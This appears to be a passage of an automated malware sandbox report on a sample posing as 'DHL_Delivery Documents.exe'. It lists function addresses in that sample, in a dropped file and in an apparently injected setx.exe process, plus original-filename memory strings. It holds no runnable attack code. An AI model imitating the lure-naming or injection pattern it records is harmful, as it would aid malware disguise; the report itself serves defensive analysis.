            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C38DBF8_2_01C38DBF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2AD008_2_01C2AD00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBCD1F8_2_01CBCD1F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10CF28_2_01C10CF2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC0CB58_2_01CC0CB5
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20C008_2_01C20C00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C12FC88_2_01C12FC8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2CFE08_2_01C2CFE0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9EFA08_2_01C9EFA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C94F408_2_01C94F40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C62F288_2_01C62F28
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40F308_2_01C40F30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC2F308_2_01CC2F30
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDEEDB8_2_01CDEEDB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32E908_2_01C32E90
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDCE938_2_01CDCE93
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20E598_2_01C20E59
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDEE268_2_01CDEE26
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2B1B08_2_01C2B1B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CEB16B8_2_01CEB16B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5516C8_2_01C5516C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0F1728_2_01C0F172
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCF0CC8_2_01CCF0CC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C270C08_2_01C270C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD70E98_2_01CD70E9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDF0E08_2_01CDF0E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C6739A8_2_01C6739A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0D34C8_2_01C0D34C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD132D8_2_01CD132D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3B2C08_2_01C3B2C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC12ED8_2_01CC12ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C252A08_2_01C252A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE95C38_2_01CE95C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBD5B08_2_01CBD5B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD75718_2_01CD7571
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C114608_2_01C11460
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDF43F8_2_01CDF43F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDF7B08_2_01CDF7B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD16CC8_2_01CD16CC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C656308_2_01C65630
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C299508_2_01C29950
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3B9508_2_01C3B950
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB59108_2_01CB5910
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C238E08_2_01C238E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8D8008_2_01C8D800
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C95BF08_2_01C95BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5DBF98_2_01C5DBF9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3FB808_2_01C3FB80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDFB768_2_01CDFB76
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCDAC68_2_01CCDAC6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C65AA08_2_01C65AA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBDAAC8_2_01CBDAAC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC1AA38_2_01CC1AA3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDFA498_2_01CDFA49
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD7A468_2_01CD7A46
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C93A6C8_2_01C93A6C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3FDC08_2_01C3FDC0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C23D408_2_01C23D40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD1D5A8_2_01CD1D5A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD7D738_2_01CD7D73
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDFCF28_2_01CDFCF2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C99C328_2_01C99C32
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C21F928_2_01C21F92
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE3FD58_2_01BE3FD5
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01BE3FD28_2_01BE3FD2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDFFB18_2_01CDFFB1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDFF098_2_01CDFF09
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C29EB08_2_01C29EB0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_0076D3849_2_0076D384
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A162609_2_04A16260
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1D3EB9_2_04A1D3EB
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1CF809_2_04A1CF80
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A100069_2_04A10006
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A100409_2_04A10040
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A162519_2_04A16251
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1D3639_2_04A1D363
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1D3789_2_04A1D378
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 9_2_04A1CF709_2_04A1CF70
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E010013_2_015E0100
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0163600013_2_01636000
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_016702C013_2_016702C0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F053513_2_015F0535
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F077013_2_015F0770
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0161475013_2_01614750
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015EC7C013_2_015EC7C0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160C6E013_2_0160C6E0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160696213_2_01606962
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F29A013_2_015F29A0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F284013_2_015F2840
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FA84013_2_015FA840
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0161E8F013_2_0161E8F0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015D68B813_2_015D68B8
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162889013_2_01628890
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015EEA8013_2_015EEA80
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FED7A13_2_015FED7A
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FAD0013_2_015FAD00
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F8DC013_2_015F8DC0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015EADE013_2_015EADE0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01608DBF13_2_01608DBF
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F0C0013_2_015F0C00
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E0CF213_2_015E0CF2
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01664F4013_2_01664F40
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01632F2813_2_01632F28
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01610F3013_2_01610F30
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E2FC813_2_015E2FC8
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0166EFA013_2_0166EFA0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F0E5913_2_015F0E59
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01602E9013_2_01602E90
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162516C13_2_0162516C
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015DF17213_2_015DF172
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FB1B013_2_015FB1B0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015DD34C13_2_015DD34C
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F33F313_2_015F33F3
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160D2F013_2_0160D2F0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160B2C013_2_0160B2C0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F52A013_2_015F52A0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015E146013_2_015E1460
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_016374E013_2_016374E0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F349713_2_015F3497
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015FB73013_2_015FB730
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F995013_2_015F9950
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160B95013_2_0160B950
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F599013_2_015F5990
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0165D80013_2_0165D800
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F38E013_2_015F38E0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01665BF013_2_01665BF0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0162DBF913_2_0162DBF9
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160FB8013_2_0160FB80
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01663A6C13_2_01663A6C
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F3D4013_2_015F3D40
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_0160FDC013_2_0160FDC0
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01609C2013_2_01609C20
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_01669C3213_2_01669C32
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F1F9213_2_015F1F92
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: 13_2_015F9EB013_2_015F9EB0
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FF7BC317_2_02FF7BC3
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FDA32317_2_02FDA323
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FEE66317_2_02FEE663
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE0C4317_2_02FE0C43
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FE0C4117_2_02FE0C41
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FD85C317_2_02FD85C3
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeCode function: 17_2_02FDA54317_2_02FDA543
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CA02C018_2_02CA02C0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC027418_2_02CC0274
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CE03E618_2_02CE03E6
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2E3F018_2_02C2E3F0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDA35218_2_02CDA352
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CB200018_2_02CB2000
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD81CC18_2_02CD81CC
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CE01AA18_2_02CE01AA
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD41A218_2_02CD41A2
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CA815818_2_02CA8158
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C1010018_2_02C10100
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CBA11818_2_02CBA118
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3C6E018_2_02C3C6E0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C1C7C018_2_02C1C7C0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C4475018_2_02C44750
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2077018_2_02C20770
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CCE4F618_2_02CCE4F6
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD244618_2_02CD2446
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC442018_2_02CC4420
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CE059118_2_02CE0591
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2053518_2_02C20535
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C1EA8018_2_02C1EA80
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD6BD718_2_02CD6BD7
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDAB4018_2_02CDAB40
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C4E8F018_2_02C4E8F0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C068B818_2_02C068B8
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2284018_2_02C22840
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2A84018_2_02C2A840
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C229A018_2_02C229A0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CEA9A618_2_02CEA9A6
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3696218_2_02C36962
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDEEDB18_2_02CDEEDB
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C32E9018_2_02C32E90
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDCE9318_2_02CDCE93
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C20E5918_2_02C20E59
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDEE2618_2_02CDEE26
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C12FC818_2_02C12FC8
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2CFE018_2_02C2CFE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C9EFA018_2_02C9EFA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C94F4018_2_02C94F40
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C62F2818_2_02C62F28
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C40F3018_2_02C40F30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC2F3018_2_02CC2F30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C10CF218_2_02C10CF2
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC0CB518_2_02CC0CB5
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C20C0018_2_02C20C00
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C1ADE018_2_02C1ADE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C38DBF18_2_02C38DBF
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2AD0018_2_02C2AD00
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CBCD1F18_2_02CBCD1F
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3B2C018_2_02C3B2C0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC12ED18_2_02CC12ED
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C252A018_2_02C252A0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C6739A18_2_02C6739A
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C0D34C18_2_02C0D34C
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD132D18_2_02CD132D
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CCF0CC18_2_02CCF0CC
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C270C018_2_02C270C0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD70E918_2_02CD70E9
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDF0E018_2_02CDF0E0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2B1B018_2_02C2B1B0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CEB16B18_2_02CEB16B
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C5516C18_2_02C5516C
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C0F17218_2_02C0F172
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD16CC18_2_02CD16CC
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C6563018_2_02C65630
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDF7B018_2_02CDF7B0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C1146018_2_02C11460
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDF43F18_2_02CDF43F
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CE95C318_2_02CE95C3
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CBD5B018_2_02CBD5B0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD757118_2_02CD7571
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CCDAC618_2_02CCDAC6
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C65AA018_2_02C65AA0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CBDAAC18_2_02CBDAAC
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CC1AA318_2_02CC1AA3
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDFA4918_2_02CDFA49
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD7A4618_2_02CD7A46
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C93A6C18_2_02C93A6C
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C95BF018_2_02C95BF0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C5DBF918_2_02C5DBF9
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3FB8018_2_02C3FB80
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDFB7618_2_02CDFB76
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C238E018_2_02C238E0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C8D80018_2_02C8D800
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C2995018_2_02C29950
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3B95018_2_02C3B950
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CB591018_2_02CB5910
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C29EB018_2_02C29EB0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C21F9218_2_02C21F92
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02BE3FD518_2_02BE3FD5
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02BE3FD218_2_02BE3FD2
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDFFB118_2_02CDFFB1
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDFF0918_2_02CDFF09
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CDFCF218_2_02CDFCF2
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C99C3218_2_02C99C32
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C3FDC018_2_02C3FDC0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02C23D4018_2_02C23D40
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD1D5A18_2_02CD1D5A
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_02CD7D7318_2_02CD7D73
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00421A3018_2_00421A30
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0043A4E018_2_0043A4E0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0041CC4018_2_0041CC40
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0041CE6018_2_0041CE60
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0041AEE018_2_0041AEE0
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_00430F8018_2_00430F80
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0041B0B818_2_0041B0B8
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0042355E18_2_0042355E
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0042356018_2_00423560
            Source: C:\Windows\SysWOW64\setx.exeCode function: String function: 02C55130 appears 58 times
            Source: C:\Windows\SysWOW64\setx.exeCode function: String function: 02C9F290 appears 105 times
            Source: C:\Windows\SysWOW64\setx.exeCode function: String function: 02C8EA12 appears 86 times
            Source: C:\Windows\SysWOW64\setx.exeCode function: String function: 02C0B970 appears 280 times
            Source: C:\Windows\SysWOW64\setx.exeCode function: String function: 02C67E54 appears 111 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: String function: 01C8EA12 appears 86 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: String function: 01C55130 appears 58 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: String function: 01C0B970 appears 280 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: String function: 01C67E54 appears 111 times
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: String function: 01C9F290 appears 105 times
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: String function: 0165EA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeCode function: String function: 01637E54 appears 97 times
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2086231730.0000000005350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2078783372.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2090689582.00000000062C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000002.2089429532.0000000005644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000000.00000000.2034582111.0000000000AB8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001D0D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL_Delivery Documents.exe
            Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.00000000017A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
